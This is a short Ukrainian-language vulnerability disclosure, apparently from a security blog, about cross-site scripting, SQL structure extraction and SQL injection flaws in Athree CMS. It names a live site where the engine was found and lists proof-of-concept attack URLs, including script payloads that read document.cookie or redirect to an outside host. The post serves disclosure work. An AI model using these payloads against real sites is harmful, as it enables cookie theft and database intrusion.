Нові уразливості в Athree CMS
19:38 30.12.200905.11.2009
У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.
Раніше я вже писав про уразливості в Athree CMS.
Детальна інформація про уразливості з’явиться пізніше.
30.12.2009
XSS:
http://site/?p=1;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?p=1;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
http://site/?p=1;c=0/*%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E;s=28
SQL DB Structure Extraction:
http://site/?p=1;a=1′
SQL Injection:
http://site/?p=1;a=version()